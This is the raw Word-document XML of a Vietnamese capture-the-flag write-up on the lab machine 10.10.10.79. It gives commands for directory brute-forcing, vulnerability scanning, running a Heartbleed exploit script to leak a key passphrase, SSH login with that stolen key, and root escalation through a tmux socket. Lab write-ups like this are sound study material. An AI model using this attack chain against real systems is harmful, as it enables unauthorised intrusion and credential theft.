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9230" w14:textId="50415FBF" w:rsidR="002F49FE" w:rsidRDefault="00FE3E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F2A4C0" wp14:editId="2078AAE9">
            <wp:extent cx="5943600" cy="2459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A23D" w14:textId="77777777" w:rsidR="00182D98" w:rsidRDefault="00182D98">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7702F794" w14:textId="058521A6" w:rsidR="00FE3EB7" w:rsidRPr="00182D98" w:rsidRDefault="00182D98">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00182D98">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -u http://10.10.10.79/FUZZ/ -c  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F6D69" w14:textId="4C24DC32" w:rsidR="00182D98" w:rsidRPr="00182D98" w:rsidRDefault="00182D98">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D20426E" w14:textId="4CCB0B66" w:rsidR="00182D98" w:rsidRPr="00182D98" w:rsidRDefault="00182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Tìm được thư mục dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179BC332" w14:textId="5DA3D964" w:rsidR="00FE3EB7" w:rsidRDefault="0027423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186785" wp14:editId="3D6C65F0">
            <wp:extent cx="4962014" cy="2992582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181" cy="29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ACF6" w14:textId="7A135F30" w:rsidR="00274238" w:rsidRDefault="00274238">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54379E29" w14:textId="0F22E696" w:rsidR="00274238" w:rsidRDefault="0027423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465E40D" wp14:editId="58140658">
            <wp:extent cx="4833257" cy="214501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278" cy="215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B47A" w14:textId="4BF14B23" w:rsidR="00274238" w:rsidRDefault="00274238">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D2F4CE" w14:textId="4EF763DA" w:rsidR="00E15F8B" w:rsidRDefault="00E15F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Tập tin hype_key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8C33B" w14:textId="03BE767E" w:rsidR="00E15F8B" w:rsidRDefault="006D71B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29C1C58" wp14:editId="11ADADF6">
            <wp:extent cx="5128872" cy="5177642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225" cy="51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8083" w14:textId="565C32A7" w:rsidR="00182D98" w:rsidRDefault="00182D98">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A100AF5" w14:textId="225648B5" w:rsidR="00C20D42" w:rsidRDefault="00C20D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chmod 600 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2880C5" w14:textId="58664295" w:rsidR="00182D98" w:rsidRDefault="00E422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Hôm nay mình học được cách quét lỗ hổng bằng nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E33DD7D" w14:textId="0276F0EC" w:rsidR="00E42215" w:rsidRPr="008832DD" w:rsidRDefault="008832DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008832DD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap --script vuln 10.10.10.79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28053F7D" w14:textId="6C616943" w:rsidR="008832DD" w:rsidRDefault="008832DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C45E1BD" w14:textId="73E7BFE6" w:rsidR="006E17F7" w:rsidRDefault="006E17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Giao thức https bị dính tới 3 lỗ hổng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38454DFC" w14:textId="0AED1539" w:rsidR="006E17F7" w:rsidRPr="00E775BB" w:rsidRDefault="00E775BB" w:rsidP="00E775B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775BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssl-heartbleed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453D165" w14:textId="0983F678" w:rsidR="00E775BB" w:rsidRPr="00E775BB" w:rsidRDefault="00E775BB" w:rsidP="00E775B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775BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssl-ccs-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269305BA" w14:textId="7D3E91E1" w:rsidR="00E775BB" w:rsidRDefault="00E775BB" w:rsidP="00E775B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775BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssl-poodle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F6F35" w14:textId="61567204" w:rsidR="00E775BB" w:rsidRDefault="00E775BB" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C60DE6A" w14:textId="0394DC13" w:rsidR="00E775BB" w:rsidRDefault="00E775BB" w:rsidP="00E775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Heartbleed là 1 lỗ hổng OpenSSL cho phép kẻ tấn công </w:t>
      </w:r>
      <w:r w:rsidR="00D00044">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“bleed” bất cứ thứ gì có trong bộ nhớ trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB8652" w14:textId="1AEC9ADC" w:rsidR="00326D1B" w:rsidRDefault="00326D1B" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FD9DB4" w14:textId="177B69BA" w:rsidR="00326D1B" w:rsidRDefault="00326D1B" w:rsidP="00E775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Chạy khai thác nhiều lần và tìm dữ liệu quan trọng, mật khẩu được mã hóa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493CB60" w14:textId="64EE14AA" w:rsidR="00326D1B" w:rsidRDefault="00326D1B" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9BA217" w14:textId="5BE9B3AB" w:rsidR="00326D1B" w:rsidRPr="0017022C" w:rsidRDefault="004B2AA6" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017022C">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python2 32745.py 10.10.10.79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9E7F9D" w14:textId="6E92715D" w:rsidR="004B2AA6" w:rsidRDefault="004B2AA6" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0313F9FF" w14:textId="797C7201" w:rsidR="004B2AA6" w:rsidRDefault="0017022C" w:rsidP="00E775B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44054BD" wp14:editId="357C37AC">
            <wp:extent cx="17526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98A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5098A" w:rsidRPr="00A5098A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00A5098A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Giải mã: </w:t>
      </w:r>
      <w:r w:rsidR="00A5098A" w:rsidRPr="00A5098A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>heartbleedbelievethehype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E9A62" w14:textId="239B5F3C" w:rsidR="00A5098A" w:rsidRDefault="00A5098A" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA14B0E" w14:textId="38C90BCA" w:rsidR="00C95756" w:rsidRDefault="00C95756" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D60499" w14:textId="43E340E1" w:rsidR="00C95756" w:rsidRDefault="00C95756" w:rsidP="00E775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Thuật toán SSH-RSA đã bị vô hiệu hóa hoàn toàn trên các phiên bản mới nhất của OpenSSH. Do đó, bạn cần chỉ định rõ thuật toán khi dùng lệnh ssh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514AC260" w14:textId="77777777" w:rsidR="00C95756" w:rsidRDefault="00C95756" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003CBE53" w14:textId="0CFFED99" w:rsidR="00C95756" w:rsidRPr="00C95756" w:rsidRDefault="00C95756" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C95756">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_rsa hype@10.10.10.79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C0B23" w14:textId="29B63B82" w:rsidR="00A5098A" w:rsidRDefault="00C95756" w:rsidP="00E775B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7E4DD14" wp14:editId="1D1AAE3F">
            <wp:extent cx="5943600" cy="2109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B4DB" w14:textId="0EC80C1B" w:rsidR="0071204F" w:rsidRDefault="0071204F" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B85136B" w14:textId="648608F0" w:rsidR="0071204F" w:rsidRDefault="00F563A0" w:rsidP="00E775B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43D1588" wp14:editId="4E105B29">
            <wp:extent cx="3378200" cy="43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BF40" w14:textId="67B794FA" w:rsidR="00F563A0" w:rsidRDefault="00F563A0" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08DB2359" w14:textId="725D48ED" w:rsidR="00195940" w:rsidRDefault="00195940" w:rsidP="00E775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Xem bash_history của người dùng hype, ta thấy hype đã dùng tmux trước đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A764B" w14:textId="7FC3AC4C" w:rsidR="00195940" w:rsidRDefault="00195940" w:rsidP="00E775B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22A0A59" wp14:editId="5D1A059D">
            <wp:extent cx="3619500" cy="287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D7B9" w14:textId="0B4E2BDD" w:rsidR="00195940" w:rsidRDefault="00195940" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AA7A25" w14:textId="2FF1C9AC" w:rsidR="00195940" w:rsidRDefault="00195940" w:rsidP="00E775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Tập tin /.devs/dev_sess có đặc quyền SUID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F13AB" w14:textId="2B1BA324" w:rsidR="00195940" w:rsidRDefault="00DF71A4" w:rsidP="00E775B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E4E6D39" wp14:editId="67EAA611">
            <wp:extent cx="5499100" cy="43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3EA4" w14:textId="38E9C167" w:rsidR="00195940" w:rsidRDefault="00195940" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAD5C37" w14:textId="6FBB03F4" w:rsidR="00195940" w:rsidRPr="00DF71A4" w:rsidRDefault="00DF71A4" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF71A4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmux -S /.devs/dev_sess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74939D33" w14:textId="77777777" w:rsidR="00DF71A4" w:rsidRDefault="00DF71A4" w:rsidP="00E775BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5666534B" w14:textId="5657AF37" w:rsidR="00F563A0" w:rsidRPr="00E775BB" w:rsidRDefault="001224DB" w:rsidP="00E775B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CE9C3B1" wp14:editId="7C68099A">
            <wp:extent cx="4762500" cy="43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3A0" w:rsidRPr="00E77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B91D44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD2E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DC"/>
    <w:rsid w:val="000658DC"/>
    <w:rsid w:val="001224DB"/>
    <w:rsid w:val="0017022C"/>
    <w:rsid w:val="00182D98"/>
    <w:rsid w:val="00195940"/>
    <w:rsid w:val="00274238"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00326D1B"/>
    <w:rsid w:val="004B2AA6"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006D71B7"/>
    <w:rsid w:val="006E17F7"/>
    <w:rsid w:val="0071204F"/>
    <w:rsid w:val="008832DD"/>
    <w:rsid w:val="00A5098A"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C20D42"/>
    <w:rsid w:val="00C57F93"/>
    <w:rsid w:val="00C95756"/>
    <w:rsid w:val="00D00044"/>
    <w:rsid w:val="00DF71A4"/>
    <w:rsid w:val="00E15F8B"/>
    <w:rsid w:val="00E42215"/>
    <w:rsid w:val="00E775BB"/>
    <w:rsid w:val="00F563A0"/>
    <w:rsid w:val="00FE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0E4506"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F208CC5A-2FC9-4C4A-8976-FBC5011E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77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2024-08-09T08:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-09T09:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>